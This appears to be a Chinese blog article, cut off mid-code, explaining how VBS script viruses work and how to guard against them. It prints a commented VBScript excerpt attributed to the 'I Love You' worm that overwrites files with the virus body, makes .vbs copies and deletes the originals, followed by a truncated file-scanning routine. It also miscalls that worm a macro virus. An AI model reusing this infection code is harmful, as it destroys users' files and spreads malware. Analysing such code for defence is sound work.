VBS脚本病毒特点及如何防范

本文详细解析了VBS脚本病毒的特性,包括其编写简单、破坏力强、感染力强、传播范围广等特点,并分析了病毒的感染机制、网络传播方式,如Email、局域网共享、网页文件等。此外,讨论了病毒如何获取系统控制权和对抗反病毒软件的策略。同时,提供了预防VBS脚本病毒的措施,如禁用FileSystemObject、卸载Windows Scripting Host等。最后,对未来脚本类病毒的发展进行了展望,预测脚本病毒将继续存在,但大规模影响的案例可能减少。
摘要由CSDN通过智能技术生成

大家可以点击进入我的资源-最新最全的免费资源下载中找到相关资源

    网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“宏病毒”网络蠕虫病毒。由于通过电子邮件系统传播,宏病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。
  
  上面提及的两个病毒最大的一个共同特点是:使用VBScript编写。以宏病毒和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对VBS脚本病毒的各个方面加以分析:
  
  一、Vbs脚本病毒的特点及发展现状
  
  VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:
  
  1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
  
  2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
  
  3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
  
  4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。
  
   5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
  
  6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
  
  7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
  正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
  
   二、Vbs脚本病毒原理分析
  
  1.vbs脚本病毒如何感染、搜索文件
  
  VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而宏病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过宏病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
  
  以下是文件感染的部分关键代码:
  
  Set fso=createobject("scripting.filesystemobject")
   '创建一个文件系统对象
  set self=fso.opentextfile(wscript.scriptfullname,1)
  '读打开当前文件(即病毒本身)
  vbscopy=self.readall
  ' 读取病毒全部代码到字符串变量vbscopy……
  set ap=fso.opentextfile(目标文件.path,2,true)
  ' 写打开目标文件,准备写入病毒代码
  ap.write vbscopy ' 将病毒代码覆盖目标文件
  ap.close
  set cop=fso.getfile(目标文件.path) '得到目标文件路径
  cop.copy(目标文件.path & ".vbs")
  ' 创建另外一个病毒文件(以.vbs为后缀)
  目标文件.delete(true)
   '删除目标文件
  
  上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
  
  下面我们具体分析一下文件搜索代码:
  
  '该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
  sub scan(folder_) 'scan函数定义,
  on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
  set folder_=fso.getfolder(folder_)
  set files=folder_.files ' 当前目录的所有文件集合
  for each file in filesext&#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值